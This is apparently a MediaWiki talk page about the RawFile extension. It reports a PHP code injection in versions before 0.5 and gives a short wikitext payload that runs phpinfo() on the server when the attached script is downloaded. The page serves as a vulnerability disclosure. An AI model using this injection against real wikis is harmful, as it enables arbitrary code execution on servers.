Talk:Mediawiki RawFile
Jump to navigation
Jump to search
Testing PHP code injection on Rawfile < 0.5 :
Adding this code to a wikipage:
<nowiki>{${phpinfo()}}</nowiki> [{{#file: myscript.sh}} as myscript.sh] <source lang=bash> #!/bin/bash echo 'Hello world!' exit 0 </source>
and trying to download myscript.sh will execute phpinfo() on the server.